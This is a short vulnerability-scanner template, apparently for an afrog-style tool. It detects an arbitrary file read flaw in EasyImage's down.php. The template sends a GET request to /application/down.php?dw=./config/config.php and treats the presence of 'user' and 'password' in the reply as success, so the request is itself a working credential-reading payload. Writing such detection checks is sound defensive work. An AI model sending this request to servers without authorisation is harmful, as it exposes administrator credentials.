id: easyimage-download-anyread

info:
  name: EasyImage down.php 任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    EasyImage down.php 文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器任意文件
    app="EasyImage-简单图床"

rules:
  r0:
    request:
      method: GET
      path: /application/down.php?dw=./config/config.php
    expression: response.status == 200 && response.body.bcontains(b"'user'") && response.body.bcontains(b"'password'") && response.body.bcontains(b"'mime'")
expression: r0()
